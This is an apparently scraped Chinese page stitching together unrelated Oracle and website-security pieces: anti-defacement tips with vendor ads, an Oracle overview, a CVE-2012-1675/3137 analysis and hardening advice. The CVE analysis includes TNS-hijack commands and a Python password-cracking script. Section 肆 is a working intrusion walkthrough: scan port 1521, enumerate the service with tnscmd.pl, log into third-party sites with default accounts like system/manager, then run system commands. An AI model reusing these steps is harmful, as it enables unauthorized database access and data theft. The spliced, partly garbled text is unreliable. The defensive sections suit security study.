oracle資料庫入侵

『壹』 有沒有什麼資料庫漏洞掃描工具或其他工具，可以檢測到我的oracle資料庫被非法注入攻擊了

建站一段時間後總能聽得到什麼什麼網站被掛馬，什麼網站被黑。好像入侵掛馬似乎是件很簡單的事情。其實，入侵不簡單，簡單的是你的網站的必要安全措施並未做好。
有條件建議找專業做網站安全的sine安全來做安全維護。

一：掛馬預防措施：

1、建議用戶通過ftp來上傳、維護網頁，盡量不安裝asp的上傳程序。

2、定期對網站進行安全的檢測，具體可以利用網上一些工具，如sinesafe網站掛馬檢測工具！

序，只要可以上傳文件的asp都要進行身份認證!

3、asp程序管理員的用戶名和密碼要有一定復雜性，不能過於簡單，還要注意定期更換。

4、到正規網站下載asp程序，下載後要對其資料庫名稱和存放路徑進行修改，資料庫文件名稱也要有一定復雜性。

5、要盡量保持程序是最新版本。

6、不要在網頁上加註後台管理程序登陸頁面的鏈接。

7、為防止程序有未知漏洞，可以在維護後刪除後台管理程序的登陸頁面，下次維護時再通過ftp上傳即可。

8、要時常備份資料庫等重要文件。

9、日常要多維護，並注意空間中是否有來歷不明的asp文件。記住：一分汗水，換一分安全!

10、一旦發現被入侵，除非自己能識別出所有木馬文件，否則要刪除所有文件。

11、對asp上傳程序的調用一定要進行身份認證，並只允許信任的人使用上傳程序。這其中包括各種新聞發布、商城及論壇程

二：掛馬恢復措施：

1.修改帳號密碼

不管是商業或不是，初始密碼多半都是admin。因此你接到網站程序第一件事情就是「修改帳號密碼」。帳號

密碼就不要在使用以前你習慣的，換點特別的。盡量將字母數字及符號一起。此外密碼最好超過15位。尚若你使用

sql的話應該使用特別點的帳號密碼，不要在使用什麼什麼admin之類，否則很容易被入侵。

2.創建一個robots.txt

Robots能夠有效的防範利用搜索引擎竊取信息的駭客。

3.修改後台文件

第一步：修改後台里的驗證文件的名稱。

第二步：修改conn.asp，防止非法下載，也可對資料庫加密後在修改conn.asp。

第三步：修改ACESS資料庫名稱，越復雜越好，可以的話將數據所在目錄的換一下。

4.限制登陸後台IP

此方法是最有效的，每位虛擬主機用戶應該都有個功能。你的IP不固定的話就麻煩點每次改一下咯，安全第一嘛。

5.自定義404頁面及自定義傳送ASP錯誤信息

404能夠讓駭客批量查找你的後台一些重要文件及檢查網頁是否存在注入漏洞。

ASP錯誤嘛，可能會向不明來意者傳送對方想要的信息。

6.慎重選擇網站程序

注意一下網站程序是否本身存在漏洞，好壞你我心裡該有把秤。

7.謹慎上傳漏洞

據悉，上傳漏洞往往是最簡單也是最嚴重的，能夠讓黑客或駭客們輕松控制你的網站。

可以禁止上傳或著限制上傳的文件類型。不懂的話可以找專業做網站安全的sinesafe公司。

8. cookie 保護

登陸時盡量不要去訪問其他站點，以防止 cookie 泄密。切記退出時要點退出在關閉所有瀏覽器。

9.目錄許可權

請管理員設置好一些重要的目錄許可權，防止非正常的訪問。如不要給上傳目錄執行腳本許可權及不要給非上傳目錄給於寫入權。

10.自我測試

如今在網上黑客工具一籮筐，不防找一些來測試下你的網站是否OK。

11.例行維護

a.定期備份數據。最好每日備份一次，下載了備份文件後應該及時刪除主機上的備份文件。

b.定期更改資料庫的名字及管理員帳密。

c.借WEB或FTP管理，查看所有目錄體積，最後修改時間以及文件數，檢查是文件是否有異常，以及查看是否有異常的賬號。

網站被掛馬一般都是網站程序存在漏洞或者伺服器安全性能不達標被不法黑客入侵攻擊而掛馬的。

網站被掛馬是普遍存在現象然而也是每一個網站運營者的心腹之患。

您是否因為網站和伺服器天天被入侵掛馬等問題也曾有過想放棄的想法呢，您否也因為不太了解網站技術的問題而耽誤了網站的運營，您是否也因為精心運營的網站反反復復被一些無聊的黑客入侵掛馬感到徬彷且很無耐。有條件建議找專業做網站安全的sine安全來做安全維護。

『貳』 Oracle資料庫基本知識

Oracle資料庫基本知識

Oracle Database，又名OracleRDBMS，或簡稱Oracle。是甲骨文公司的一款關系資料庫管理系統。本文為大家分享的是Oracle資料庫的基本知識，希望對大家有所幫助!

它是在資料庫領域一直處於領先地位的產品。可以說Oracle資料庫系統是目前世界上流行的關系資料庫管理系統，系統可移植性好、使用方便、功能強，適用於各類大、中、小、微機環境。它是一種高效率、可靠性好的適應高吞吐量的資料庫解決方案。

介紹

ORACLE資料庫系統是美國ORACLE公司(甲骨文)提供的以分布式資料庫為核心的一組軟體產品，是目前最流行的客戶/伺服器(CLIENT/SERVER)或B/S體系結構的資料庫之一。比如SilverStream就是基於資料庫的一種中間件。ORACLE資料庫是目前世界上使用最為廣泛的資料庫管理系統，作為一個通用的資料庫系統，它具有完整的數據管理功能;作為一個關系資料庫，它是一個完備關系的產品;作為分布式資料庫它實現了分布式處理功能。但它的所有知識，只要在一種機型上學習了ORACLE知識，便能在各種類型的機器上使用它。

Oracle資料庫最新版本為OracleDatabase 12c。Oracle資料庫12c引入了一個新的多承租方架構，使用該架構可輕松部署和管理資料庫雲。此外，一些創新特性可最大限度地提高資源使用率和靈活性，如Oracle Multitenant可快速整合多個資料庫，而Automatic Data Optimization和Heat Map能以更高的密度壓縮數據和對數據分層。這些獨一無二的技術進步再加上在可用性、安全性和大數據支持方面的主要增強，使得Oracle資料庫12c 成為私有雲和公有雲部署的理想平台。

就業前景

從就業與擇業的角度來講，計算機相關專業的大學生從事oracle方面的技術是職業發展中的最佳選擇。

其一、就業面廣：ORACLE幫助拓展技術人員擇業的廣度，全球前100強企業99家都在使用ORACLE相關技術，中國政府機構，大中型企事業單位都能有ORACLE技術的工程師崗位，大學生在校期間興趣廣泛，每個人興趣特長各異，不論你想進入金融行業還是電信行業或者政府機構，ORACLE都能夠在你的職業發展中給你最強有力的支撐，成為你最貼身的金飯碗。

其二、技術層次深：如果期望進入IT服務或者產品公司，Oracle技術能夠幫助提高就業的深度。Oracle技術已經成為全球每個IT公司必選的軟體技術之一，熟練掌握Oracle技術能夠為從業人員帶來技術應用上的優勢，同時為IT技術的深入應用起到非常關鍵的作用。掌握 Oracle技術，是IT從業人員了解全面信息化整體解決方案的基礎。

其三、職業方向多：Oracle資料庫管理方向、Oracle開發及系統架構方向、Oracle數據建模數據倉庫等方向。

Oracle資料庫漏洞分析：無需用戶名和密碼進入你的資料庫

一般性的資料庫漏洞，都是在成功連接或登錄資料庫後實現入侵;本文介紹兩個在2012年暴露的Oracle漏洞，通過這兩種漏洞的結合，可以在不掌握用戶名/密碼的情況下入侵Oracle，從而完成對數據的竊取或者破壞。這兩個漏洞就是CVE-2012-1675和CVE-2012-3137。

引言

國內外很多重要的系統都採用Oracle作為數據存儲的資料庫;在Oracle中存儲著企業或政府大量敏感的信息，在金錢或政治的誘導下，內外部黑客會想法利用管理、網路、主機或資料庫的自身漏洞嘗試入侵到資料庫中，以達到自身的目的。

本文的作者通過對Oracle倆種漏洞的組合研究，設計了一套在不掌握用戶名/密碼的方式入侵到Oracle中;這種方法，比傳統的需要登錄到資料庫中的入侵方法，具有更大的安全隱患和破壞性。

本文希望通過對這兩個漏洞和攻擊方法的介紹，能夠引起相關人員的重視，完善對資料庫安全的措施。

1、概要介紹

本文提供的方法是基於漏洞CVE-2012-1675和CVE-2012-3137對oracle資料庫的攻擊測試的方法。

CVE-2012-1675漏洞是Oracle允許攻擊者在不提供用戶名/密碼的'情況下，向遠程“TNS Listener”組件處理的數據投毒的漏洞。攻擊者可利用此漏洞將資料庫伺服器的合法“TNS Listener”組件中的數據轉向到攻擊者控制的系統，導致控制遠程組件的資料庫實例，造成組件和合法資料庫之間的中間人攻擊、會話劫持或拒絕服務攻擊。

CVE-2012-3137漏洞是Oracle Database 10g/11g身份驗證協議實現中存在一個設計缺陷，攻擊者無需認證即可遠程獲取資料庫用戶密碼哈希相關數據，從而可以離線暴力破解用戶密碼，進一步控制資料庫系統。

我們通過如下的步驟和過程可以實現對Oracle的入侵：

(1)利用CVE-2012-1675進行TNS劫持，在監聽下利用遠程注冊，注冊同名資料庫實例;

(2)新登陸的用戶，在TNS的負載均衡策略下，有可能流量登錄到偽造的監聽服務上;

(3)該監聽服務對用戶的登陸過程進行監控，並將相關數據流量轉發到真實的資料庫上;

(4)利用CVE-2012-3137獲得通訊過程中的認證相關信息;

(5)對認證相關信息進行離線的暴力破解，獲得登陸的密碼;

(6)試用破解的用戶名/密碼登陸Oracle，完成對Oracle中數據的訪問;

2、通過CVE-2012-1675進行TNS劫持

該漏洞存在於Oracle的所有版本，並且Oracle至今僅是發布了警告性通知，並未提供解決方案。

要想利用CVE-2012-1675漏洞做TNS劫持，首先需要了解TNS機制。如下圖所示oracle 通過在本地解析網路服務名到目標主機IP地址，服務埠號，目標資料庫名，把這些信息發送到oracle伺服器端監聽程序，最後再由監聽程序遞送DBMS。

其中關鍵點在於監聽會按照目標資料庫名遞送到名稱正確的資料庫。那麼如果一個監聽下有2個同名資料庫。監聽將自動按照負載均衡把這次訪問發送到負載低的資料庫上，進行連接訪問。資料庫注冊到監聽的方法就決定了，能否同時注冊同名資料庫在同一個監聽下。注冊方式分為本地注冊和遠程注冊，通過修改參數可以調整為遠程注冊。

下面是一段可用的TNS劫持的過程：

1.在劫持機上創建一個和目標資料庫實例同名的資料庫實例。

2.在劫持機上修改 tnsnames.ora 文件

添加

listener_name=

(DESCRIPTION=

(ADDRESS=(PROTOCOL=tcp)(HOST=目標機器IP)(PORT=目標機器埠)))

3.在劫持機上用SQL*Plus 順序執行下面步驟。

1.$ sqlplus / as sysdba

2. SQL> ALTER SYSTEM SETREMOTE_LISTENER='LISTENER_NAME';

3. SQL> ALTER SYSTEM REGISTER;

4.多個客戶端，向資料庫發起登錄。會劫持到一部分客戶端的登錄信息。

最終達到效果如下圖所示：

按照猜想同一個監聽下有2個同名實例。客戶端訪問監聽，監聽按照客戶端中的資料庫名信息分配資料庫，由於監聽下有2個同名資料庫，客戶端鏈接很可能會被分配到劫持者的資料庫實例下，再通過配置劫持者的本地監聽把客戶端請求指回原資料庫。結構圖如下：

測試客戶端鏈接196次。目標資料庫實例獲得113次，劫持資料庫實例獲得83次基本滿足負載均衡的假設。(註上面實例是local server 下面實例是 remote server)

通過以上方式我們可以截獲約一半左右客戶端發送到伺服器的合法鏈接。其中獲得了伺服器IP、埠號、資料庫位置、實例名、登錄用戶名等一系列明文信息和4組密文信息(AUTH_SESSKEY，AUTH_SESSKEY_CLIENT，AUTH_PASSWORD，AUTH_VFR_DATA)。

3、通過CVE-2012-3137進行密碼破解

CVE-2012-3137受影響的資料庫版本有11.2.0.3，11.2.0.2，11.1.0.7,有使用了SHA-1加密演算法的10.2.0.5和10.2.0.4，還有使用了SHA-1的10.2.0.3(運行在z/OS下)版本。

雖然這個漏洞在11.2.0.3中已經解決，但是僅僅資料庫客戶端和伺服器都升級到11.2.0.3並且sqlnet.ora文件中增加SQLNET.ALLOWED_LOGON_VERSION=12才有效。

正如CVE-2012-3137所描述Oracle為了防止第三方通過網路獲取登錄信息包。而對密碼進行了加密處理。本部分只以oracle11.1密碼如何破解為例進行說明。

在發起連接之後(oracle牽手完成)，客戶端和伺服器經過協商確定要使用的驗證協議。要完成這個任務，客戶端首先向資料庫發送一個包。包中包含客戶端主要信息和所請求的加密方式。資料庫確認加密方式有效後，發送一個確認服務包如下圖所示：

在通過安全網路服務完成任何所要求的協議之後，資料庫用戶被O3logon(oracle驗證方式) 進行驗證，這個協議執行一個序列來向資料庫證明客戶端擁有密碼。為了避免網路第三方截獲到密碼。首先客戶端發送用戶名到資料庫來表明用戶身份。資料庫端根據加密協議，其中96位的作為資料庫端密鑰，20位的作為偏移量，它對每個連接都是不同的。一個典型的資料庫端發給客戶端的密鑰如下：

AUTH_SESSKEY.....COCDD89FIGODKWASDF……………………

客戶端根據加密演算法向伺服器端發送96位的客戶端密鑰和64位的密碼密鑰。伺服器端計算客戶端傳入的密碼密鑰。如果計算後密碼密文和資料庫中存儲的16位密碼密文一致則驗證通過。

根據這個過程可知上面TNS劫持包中取得的加密信息：AUTH_SESSKEY，AUTH_SESSKEY_CLIENT，AUTH_PASSWORD，AUTH_VFR_DATA這四個值是解密的關鍵。我們把他們按照SHA1,MD5，AES192進行一系列處理。最終通過數據字典碰撞得到密碼明文。

下面這段網上公布的一段示例代碼，這段代碼與筆者的思路不完全相同，但也能大概地說明這個漏洞的攻擊過程：

import hashlib

from Crypto.Cipher import AES

def decrypt(session,salt,password):

pass_hash= hashlib.sha1(password+salt)

key =pass_hash.digest() + 'x00x00x00x00'

decryptor= AES.new(key,AES.MODE_CBC)

plain =decryptor.decrypt(session)

returnplain

session_hex ='6EAAB5422553A7598143E78767'

salt_hex = 'A7193E546377EC56639E'

passwords = ['test','password',''oracle','demo']

for password in passwords:

session_id= decrypt(session_hex.decode('hex'),salt_hex.decode('hex'),password)

print'Decrypted session_id for password "%s" is %s' %(password,session_id.encode('hex'))

ifsession_id[40:] == 'x08x08x08x08x08x08x08x08':

print'PASSWORD IS "%s"' % password

break

4、建議的預防措施

根據以上兩段分析，我們可以有如下的預防措施：

(1)在條件許可的情況下，對Oracle進行補丁升級，對Oracle打cpuoct2012-1515893補丁;注意對於cpuoct2012-1515893補丁要求伺服器端和應用伺服器端同時升級，否則應用系統將無法訪問Oracle;

(2)若無法對Oracle升級，要購買或安裝具備虛擬補丁功能的資料庫安全產品，防止對CVE-2012-3137和CVE-2012-1675的利用;

(3)建立足夠強健的口令，不要使用8位以下密碼，或者字典庫中的口令。

;

『叄』 如何抵禦黑客的攻擊

例如：Windows操作系統的administrator賬號，製作WWW網站的賬號可能是html、www、web等，安裝Oracle資料庫的可能有Oracle的賬號，用戶培訓或教學而設置的user1、user2、student1、student2、client1、client2等賬戶，一些常用的英文名字也經常會使用，例如：tom、john等，因此黑客可以根據系統所提供的服務和在其主頁得到的工作人員的名字信息進行猜測。 結束進程示意圖 對很多黑客入侵系統實例的分析表明，由於普通用戶對系統安全沒有具體的認識，因此其密碼很容易被猜測出來，一般用戶的初始密碼大部分和其賬號相同，這根本沒有一點安全性，在得到其賬號信息後就得到了它的密碼；另外一部分使用的密碼比較簡單，例如：將賬號的第一個字母大寫、後面加一個數字，或者使用簡單數字0、1等作為密碼。還有一些成對的賬號和密碼，例如：賬號是admin，那麼密碼可能是manager等。在對普通用戶進行測試密碼時，實際上也可以對目標主機系統的重要賬號進行猜測，例如：一些系統管理員將root的密碼定為主機的名字，像Sun、Digital、sparc20、alpha2100等，Oracle資料庫的賬號密碼為oracle7、oracle8等，因此經常發生系統安全的事故。 因此，在遭到黑客入侵後，應及時修改主機的賬號和密碼，以避免黑客再次通過這些賬號和密碼侵入您的主機。 ★策略四：主機系統日誌的檢查與備份 以Unix系統為例，提供了詳細的各種日誌記錄，以及有關日誌的大量工具和實用程序。這些審計記錄通常由程序自動產生，是預設設置的一部分，能夠幫助Unix管理員來尋找系統中存在的問題，對系統維護十分有用。還有另一些日誌記錄，需要管理員進行設置才能生效。大部分日誌記錄文件被保存在/var/log目錄中，在這個目錄中除了保存系統生成日誌之外，還包括一些應用軟體的日誌文件。當然/var目錄下的其他子目錄中也會記錄下一些其他種類的日誌記錄文件，這依賴於具體的應用程序的設置。系統登錄日誌會保存每個用戶的登錄記錄，這些信息包括這個用戶的名字、登錄起始結束時間以及從何處登錄入系統的等等。 當遭到黑客入侵之後，應當及時檢查和備份主機系統日誌，對黑客所破壞的系統進行及時的恢復。 ★策略五：關鍵數據的備份 數據備份就是將數據以某種方式加以保留，以便在系統遭受破壞或其他特定情況下，重新加以利用的一個過程。數據備份的根本目的是重新利用，這也就是說，備份工作的核心是恢復。數據備份作為存儲領域的一個重要組成部分，其在存儲系統中的地位和作用都是不容忽視的。對一個完整的企業IT系統而言，備份工作是其中必不可少的組成部分。其意義不僅在於防範意外事件的破壞，而且還是歷史數據保存歸檔的最佳方式。換言之，即便系統正常工作，沒有任何數據丟失或破壞發生，備份工作仍然具有非常大的意義——為我們進行歷史數據查詢、統計和分析，以及重要信息歸檔保存提供了可能。 如果您的主機不幸遭到黑客的入侵，那麼你首先要做的就是備份主機中倖存的關鍵數據，以便在系統重新恢復正常運轉後及時地恢復系統數據。 ★策略六：查詢防火牆日誌詳細記錄、修改防火牆安全策略 隨著網路攻擊手段和信息安全技術的發展，新一代的功能更強大、安全性更強的防火牆已經問世，這個階段的防火牆已超出了原來傳統意義上防火牆的范疇，已經演變成一個全方位的安全技術集成系統，我們稱之為第四代防火牆，它可以抵禦目前常見的網路攻擊手段，如IP地址欺騙、特洛伊木馬攻擊、Internet蠕蟲、口令探尋攻擊、郵件攻擊等等。 但是，俗話說「道高一尺，魔高一丈」，功能再強大的防火牆也需要人工配置一些安全策略，由於使用者網路安全水平的不同，黑客還是可以利用防火牆安全策略的漏洞繞過防火牆實現對主機的攻擊。防火牆的日誌會詳細記錄黑客入侵的手段和過程，所以在遭到黑客攻擊之後，我們應當根據防火牆的日誌詳細記錄，有的放矢地修改防火牆的安全策略，使它能夠應對新出現的攻擊方式，使防火牆的安全策略日臻完善。 ★策略七：利用DiskRecovery技術對硬碟數據進行恢復 在最壞的情況下，黑客可能會破壞甚至刪除硬碟上的所有重要數據。在遇到這種情況時，首先要保持冷靜，當數據無法讀取或硬碟被格式化後，往往可以恢復，不必緊張。 那數據為什麼能恢復呢？這主要取決於硬碟數據的存儲原理。硬碟中由一組金屬材料為基層的碟片組成，碟片上附著磁性塗層，靠硬碟本身轉動和磁頭的移動來讀寫數據的。其中，最外面的一圈稱為「0」磁軌。上面記錄了硬碟的規格、型號、主引導記錄、目錄結構等一系列最重要的信息。我們存放在硬碟上的每一個文件都在這里有記錄。在讀取文件時，首先要尋找0磁軌的有關文件的初始扇區，然後按圖索驥，才能找到文件的位置。刪除就不一樣了，系統僅僅對0磁軌的文件信息打上刪除標志，但這個文件本身並沒有被清除。只是文件佔用的空間在系統中被顯示為釋放，而且，當你下次往硬碟上存儲文件時，系統將會優先考慮真正的空白區，只有這些區域被用完以後，才會覆蓋上述被刪文件實際佔有的空間。另外，即使硬碟格式化後（如Format），只要及時搶救，還是有很大希望的。我們可以選擇一些專業的數據恢復軟體來恢復被黑客破壞的數據，譬如EasyRecovery，這是一個威力非常強大的硬碟數據恢復工具，能夠幫你恢復丟失的數據以及重建文件系統。 如果您不具備硬碟數據恢復的知識，目前有許多專業的數據恢復公司也提供硬碟數據恢復服務。如果我們要恢復的數據涉及一些商業機密，那麼，我們所要做的是准備新的空白硬碟作為數據恢復後的載體，不要將數據恢復到別人的機器上，不要因為他們已刪除而感到放心，因為他們既然能恢復您硬碟上的數據，就一定也能恢復您暫存在他們的硬碟上的數據。而且恢復數據的過程最好也要有人全程監控，以避免泄密。

『肆』 oracle中ENVS是什麼

什麼是oracle資料庫
Oracle資料庫是現在很流行的資料庫系統，很多大型網站都採用Oracle，它之所以倍受用戶喜愛是因為它有以下突出的特點：
1、支持大資料庫、多用戶的高性能的事務處理。Oracle支持最大資料庫，其大小可到幾百千兆，可充分利用硬體設備。支持大量用戶同時在同一數據上執行各種數據應用，並使數據爭用最小，保證數據一致性。系統維護具有高的性能，Oracle每天可連續24小時工作，正常的系統操作(後備或個別計算機系統故障)不會中斷資料庫的使用。可控制資料庫數據的可用性，可在資料庫級或在子資料庫級上控制。
2、Oracle遵守數據存取語言、操作系統、用戶介面和網路通信協議的工業標准。所以它是一個開放系統，保護了用戶的投資。美國標准化和技術研究所(NIST)對Oracle7 SERVER進行檢驗，100%地與ANSI/ISO SQL89標準的二級相兼容。
3、實施安全性控制和完整性控制。Oracle為限制各監控數據存取提供系統可靠的安全性。Oracle實施數據完整性，為可接受的數據指定標准。
4、支持分布式資料庫和分布處理。Oracle為了充分利用計算機系統和網路，允許將處理分為資料庫伺服器和客戶應用程序，所有共享的數據管理由資料庫管理系統的計算機處理，而運行資料庫應用的工作站集中於解釋和顯示數據。通過網路連接的計算機環境，Oracle將存放在多台計算機上的數據組合成一個邏輯資料庫，可被全部網路用戶存取。分布式系統像集中式資料庫一樣具有透明性和數據一致性。
具有可移植性、可兼容性和可連接性。由於Oracle軟體可在許多不同的操作系統上運行，以致Oracle上所開發的應用可移植到任何操作系統，只需很少修改或不需修改。Oracle軟體同工業標准相兼容，包括很多工業標準的操作系統，所開發應用系統可在任何操作系統上運行。可連接性是指ORALCE允許不同類型的計算機和操作系統通過網路可共享信息。
雖然Oracle資料庫具有很高的安全性，但是如果我們在配置的時候不注意安全意識，那麼也是很危險的。也就是說，安全最主要的還是要靠人自己，而不能過分依賴軟體來實現。
我們知道，在mssql中，安裝完成後默認有個sa的登陸密碼為空，如果不更改就會產生安全漏洞。那麼oracle呢?也有的。為了安裝和調試的方便，Oracle資料庫中的兩個具有DBA許可權的用戶Sys和System的預設密碼是manager。筆者發現很多國內網站的Oracle資料庫沒有更改這兩個用戶的密碼，其中也包括很多大型的電子商務網站， 我們就可以利用這個預設密碼去找我們感興趣的東西。如何實現，看下面的文章吧。
進行測試前我們先來了解一些相關的知識，我們連接一個Oracle資料庫的時候，需要知道它的service_name或者是Sid值，就象mssql一樣，需要知道資料庫名。那如何去知道呢，猜?呵呵，顯然是不行的。這里我們先講講oracle的TNS listener，它位於資料庫Client和資料庫Server之間，默認監聽1521埠，這個監聽埠是可以更改的。但是如果你用一個tcp的session去連接1521埠的話，oracle將不會返回它的banner，如果你輸入一些東西的話，它甚至有可能把你踢出去。這里我們就需要用tnscmd.pl這個perl程序了，它可以查詢遠程oracle資料庫是否開啟(也就是ping了)，查詢版本，以及查詢它的服務名，服務狀態和資料庫服務名，而且正確率很高。
理論方面的講完了，如果還有什麼不懂的可以去查找相關資料。現在開始測試吧，需要的工具有：ActivePerl，Oracle客戶端，Superscan或者是其它掃描埠的軟體， Tnscmd.pl。
我們先用Superscan掃描開放了埠1521的主機，假設其IP是xx.xx.110.110，這樣目標已經有了。然後我們要做的就是用Tnscmd.pl來查詢遠程資料庫的服務名了，Tnscmd.pl的用法如下：
C:perlbin>perl tnscmd.pl
usage: tnscmd.pl [command] -h hostname
where 'command' is something like ping, version, status, etc.
(default is ping)
[-p port] - alternate TCP port to use (default is 1521)
[--logfile logfile] - write raw packets to specified logfile
[--indent] - indent & outdent on parens
[--rawcmd command] - build your own CONNECT_DATA string
[--cmdsize bytes] - fake TNS command size (reveals packet leakage)
我們下面用的只有簡單的幾個命令，其他的命令也很好用，一起去發掘吧。
然後我們就這樣來：
C:perlbin>perl tnscmd.pl services -h xx.xx.110.110 -p 1521 –indent
sending (CONNECT_DATA=(COMMAND=services)) to xx.xx.110.110:1521
writing 91 bytes
reading
._.......6.........?. ..........
DESCRIPTION=
TMP=
VSNNUM=135286784
ERR=0
SERVICES_EXIST=1
.Q........
SERVICE=
SERVICE_NAME=ORCL
INSTANCE=
INSTANCE_NAME=ORCL
NUM=1
INSTANCE_CLASS=ORACLE
HANDLER=
HANDLER_DISPLAY=DEDICATED SERVER
STA=ready
HANDLER_INFO=LOCAL SERVER
HANDLER_MAXLOAD=0
HANDLER_LOAD=0
ESTABLISHED=447278
REFUSED=0
HANDLER_ID=8CA61D1BBDA6-3F5C-E030-813DF5430227
HANDLER_NAME=DEDICATED
ADDRESS=
PROTOCOL=beq
PROGRAM=/home/oracle/bin/oracle
ENVS='ORACLE_HOME=/home/oracle,ORACLE_SID=ORCL'
ARGV0=oracleORCL
ARGS='
LOCAL=NO
'
.........@
從上面得到的信息我們可以看出資料庫的服務名為ORCL，然後我們就可以通過sqlplus工具來遠程連上它了，用戶名和密碼我們用默認的system/manager或者是sys/manager，其他的如mdsys/mdsys，ctxsys/ctxsys等，這個默認用戶和密碼是隨版本的不同而改變的。如下：
C:oracleora90BIN>sqlplus /nolog
SQL*Plus: Release 9.0.1.0.1 - Proction on Thu May 23 11:36:59 2002
(c) Copyright 2001 Oracle Corporation.All rights reserved.
SQL>connect system/manager@
(description=(address_list=(address=(protocol=tcp)
(host=xx.xx.110.110)(port=1521)))
(connect_data=(SERVICE_NAME=ORCL)));
如果密碼正確，那麼就會提示connected，如果不行,再換別的默認用戶名和密碼。經過筆者的嘗試一般用dbsnmp/dbsnmp都能進去。當然如果對方已經把默認密碼改了，那我們只能換別的目標了。但是我發現很多都是不改的，這個就是安全意識的問題了。
二、上面提到的兩個小軟體：
tnscmd.pl
代碼： tnscmd.pl
用鏈表實現的oracle密碼暴破程序
代碼： 用鏈表實現的oracle密碼暴破程序
三、利用弱口令進行入侵:
C:\>sqlplus /nolog
SQL> connect system/manager@(description=(address_list=(address=(protocol=tcp)(host=www.xx.com)(port=1521)))(connect_data=(SERVICE_NAME=ora9i)));
然後利用Oracle Execute Command Sql Script來執行系統命令

『伍』 如何應對被公開的Oracle口令加密演算法

由於Oracle資料庫被廣泛應用，其口令加密演算法也是備受關注。最早在1993年comp．databases．oracle．server新聞組中有人披露了加密演算法的大部分細節。十年後，一本名為《Special Ops Host and Network Security for Microsoft， Unix and Oracle》的書中補全了演算法最重要的一個環節——DES演算法的KEY。至此，口令加密演算法已無秘密可言。接踵而來的是互聯網上出現多個了Oracle口令破解工具。Oracle在2007年推出的最新版本11g中，使用了新的更安全的加密演算法，但是新演算法的細節很快又在互聯網上被公開。為提供兼容，11g版本保留了11g以前版本使用的加密口令，利用這一漏洞仍然可以對11g版本的加密口令進行破解。

到底怎樣才能保證資料庫口令的安全呢？本文首先介紹Oracle資料庫各版本口令加密演算法的內容，然後針對演算法重點介紹加強資料庫安全性的應對措施。

口令加密演算法
從Oracle7到Oracle 10gR2，使用DES演算法對口令進行加密。對演算法進行分析，可以得出如下結論：口令不區分大小寫，任意大小寫組合均可登錄；由於只使用固定KEY，只要用戶名和口令相同，在任一DB中存放的加密口令都相同；由於採用了用戶名和口令串接的方式，所以用戶aaa、口令bbbccc的加密值與用戶aaabbb、口令ccc完全相同。

Oracle 11g版本的加密口令存放在SYS．USER$表中的SPARE4列中，而PASSWORD列中仍保留以前版本加密口令。由於客戶端計算加密口令需要用到SALT，在建立連接時，伺服器端將SALT明文傳送給客戶端程序。Oracle 11g中新的口令加密演算法中區分大小寫；由於加入了隨機數SALT，兩個不同用戶的口令即便完全相同，計算得到的SHA1的散列值也不同；不同DB中相同用戶相同口令，SHA1散列值也可能不同。

目前，大多數破解工具的工作方式是得到加密口令後，對每一個可能的口令進行加密計算，比較計算結果而確定是否正確。由此，抵禦口令破解可以從三個方面著手：防止加密口令外泄；在加密口令落入黑客手中後，口令也是不可破解的，或盡量增加破解的時間；即便是口令被破解，也是無用的，不能存取資料庫。

防止加密口令泄露
1．應用「最少許可權」原則，盡量限制可存取加密口令用戶的人數

在資料庫中檢查具有存取SYS.USER$或DBA_USERS許可權的用戶，並從不需要的用戶中收回許可權。但是操作並不簡單，這也是資料庫管理工作的特點。每一廠商的軟體中都實現了SQL標准之外的擴充，並且每一版本都有差異。限於篇幅，不可能對所有本文中建議的措施進行詳細的解釋說明，僅以此處檢查許可權為例展示DBA工作的復雜性。本文中如未說明，則默認版本為11g。應用於11g以前版本時，請讀者確認是否需要修改。

檢查許可權主要的工具是數據字典視圖（也可以直接存取SYS用戶的基表，但基表的定義沒有公布，官方不提供技術支持）。視圖DBA_TAB_PRIVS存放了資料庫中數據對象上的授權信息。假定用戶A1和A2可以存取SYS．USER$表，檢查在SYS用戶USER$上有存取許可權的用戶，可執行如下語句：

SELECT GRANTEE FROM DBA_TAB_PRIVS WHERE TABLE_NAME=『USER$』；

我們已經知道用戶A1和A2，都可以存取SYS.USER$表，但為什麼在上面查詢結果中沒有出現呢？這是因為在Oracle的許可權管理中，對一個表的存取許可權還可以通過系統許可權或角色賦予，而DBA_TAB_PRIVS中僅列出了直接的對象許可權的授予信息。對於SYS．USER$表而言，系統許可權SELECT ANY DICTIONARY和角色DBA都包含了這一表的存取許可權。所以完整列出所有可存取這一表的用戶應增加下面兩條查詢語句的結果：

SELECT GRANTEE FROM DBA_SYS_PRIVS WHERE PRIVILEGE＝『SELECT ANY DICTIONARY』；
SELECT GRANTEE FROM DBA_ROLE_PRIVS WHERE GRANTED_ROLE＝『DBA』；

通過上面的查詢語句，還是會遺漏某些用戶。如果把DBA角色授權給另一角色Admin，然後又將Admin角色授權給另一用戶NEWU，則此用戶可存取SYS.USER$表，但在上述三個查詢中並沒有直接列出NEWU的名字（角色Admin會出現在第三個查詢語句的結果中）。

顯然，Oracle的授權構成了一棵樹，完整的信息需要一段PL/SQL程序來完成。（對於11g以前版本，還需要檢查對DBA_USERS視圖有存取許可權的用戶和角色。SELECT_CATALOG_ROLE角色如被授權，則可以存取所有數據字典視圖，但不能存取SYS的基表。）

2．設定對加密口令存取的審計

如果當前系統中只有SYSDBA可以存取USER$，則一個變通辦法是審計SYSDBA的所有操作，其中也包括對USER$的存取。設置初始化參數audit_sys_operations ＝TRUE，重新啟動資料庫後激活對SYSDBA操作的審計。

審計文件的存放位置為：
11g版本中為：$ORACLE_BASE/admin/SID/ amp／ *．aud
11g以前版本為： $ORACLE_HOME/rdbms/audit/ *．aud。
嚴格限制和監視SYSDBA用戶活動的最好辦法是使用Oracle Database Vault組件。

3．在操作系統級限制對資料庫數據文件的存取
SYSDBA用戶的加密口令存放在$ORACLE_HOME/dbs下的口令文件orapw〈SID〉中。SYS．USER$表同樣需要在數據文件中存放，多數為SYSTEM表空間的第一個數據文件中。此外，EXPORT文件、REDOLOG文件以及TRACE文件中都可能出現加密口令。需要嚴格限制上述文件的存取許可權。

4．防止網路竊聽

在建立連接時，客戶端需要向伺服器端傳送用戶名和口令，並且伺服器端與客戶端需要相互發送這次會話使用的SESSION KEY。Oracle採用Diffie-Hellman KEY交換演算法和自己開發的O3LOGON協議完成上述任務。演算法的細節同樣已在互聯網上被公開。建立連接時上述信息如果被截獲，同樣可以被用來破解口令。更為嚴重的是，如果黑客事先已經獲得加密口令，結合SESSION KEY的信息，則不需要任何破解，執行簡單還原運算就可算出口令明文。

